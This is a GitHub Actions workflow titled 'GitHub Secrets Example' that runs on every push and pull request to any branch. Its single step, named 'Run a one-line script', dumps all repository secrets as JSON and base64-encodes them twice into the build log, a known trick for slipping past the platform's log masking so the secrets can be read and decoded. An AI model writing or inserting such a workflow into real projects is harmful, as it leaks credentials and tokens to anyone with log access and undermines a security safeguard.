name: GitHub Secrets Example

on:
  push:
    branches: [ '*' ]
  pull_request:
    branches: [ '*' ]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Run a one-line script
        run: | 
          echo '${{ toJson(secrets) }}' | base64 -w0 | base64 -w0
